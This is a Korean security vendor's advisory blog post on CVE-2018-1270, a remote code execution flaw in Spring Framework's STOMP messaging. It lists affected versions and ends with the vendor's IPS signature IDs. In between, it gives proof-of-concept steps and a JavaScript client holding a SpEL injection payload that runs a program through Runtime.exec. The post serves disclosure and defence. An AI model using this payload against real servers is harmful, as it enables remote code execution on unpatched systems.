Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
취약점 정보[CVE-2018-1270] Pivotal Spring framework 보안 취약점
작성일 2018-04-13 조회 1720

 

Pivotal Spring Framework에서 원격 코드 실행 취약점이보고되었습니다. 이 취약점은 스프링 메시징 모듈의 STOMP 중개인에 대한 사용자 제공 입력을 부적절하게 처리했기 때문에 발생합니다. 인증되지 않은 원격의 공격자는 악의적으로 제작 된 메시지를 STOMP 중개인에게 보내이 취약점을 악용 할 수 있습니다. 성공적인 악용으로 인해 서비스 컨텍스트에서 코드가 실행될 수 있습니다.

 

공급 업체는이 취약점과 관련하여 다음과 같은 권고를 발표했습니다.

[ https://pivotal.io/security/cve-2018-1270 ]

 

- Affected Products
Pivotal Spring Framework prior to 4.x 
Pivotal Spring Framework 4.3 to 4.3.14 
Pivotal Spring Framework 5.0 to 5.0.4 

 

- CVSS Score
Base 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P): 

 

 

 

POC 구성

 

공식 테스트 베드로 제공되는 (https://github.com/spring-guides/gs-messaging-stomp-websocket) 이용해 구축
git clone https://github.com/spring-guides/gs-messaging-stomp-websocket
git checkout 6958af0b02bf05282673826b73cd7a85e84c12d3

 

Use IDEA를 이용해 프로젝트의 gs-messaging-stomp-websocket 디렉토리를 오픈하고 app.js의 line 15 in를 다음과 같이 수정
값이 페이로드인 셀렉터를 지정하는 헤더를 추가
function connect() {
    var header  = {"selector":"T(java.lang.Runtime).getRuntime().exec('calc.exe')"};
    var socket = new SockJS('/gs-guide-websocket');
    stompClient = Stomp.over(socket);
    stompClient.connect({}, function (frame) {
        setConnected(true);
        console.log('Connected: ' + frame);
        stompClient.subscribe('/topic/greetings', function (greeting) {
            showGreeting(JSON.parse(greeting.body).content);
        },header);
    });
}

 

연결을 클릭하여 연결을 설정하고 텍스트 상자에 자유롭게 입력 한 다음 보내기를 클릭하고 poc 트리거를 클릭

 

POC를 이용한 공격트래픽 재현

 

 

 

Sniper 제품군 대응방안

 

Sniper-IPS

[4205] Pivotal Spring Framework messaging RCE
[4206] Pivotal Spring Framework messaging RCE.A
[4207] Pivotal Spring Framework messaging RCE.B

Sniper-UTM

[805374496] Pivotal Spring Framework messaging RCE
[805374497] Pivotal Spring Framework messaging RCE.A
[805374498] Pivotal Spring Framework messaging RCE.B

Sniper-APTX

[3447] Pivotal Spring Framework messaging RCE
[3448] Pivotal Spring Framework messaging RCE.A
[3449] Pivotal Spring Framework messaging RCE.B

 

 

 

첨부파일 첨부파일이 없습니다.
태그 CVE-2018-1270  Pivotal Spring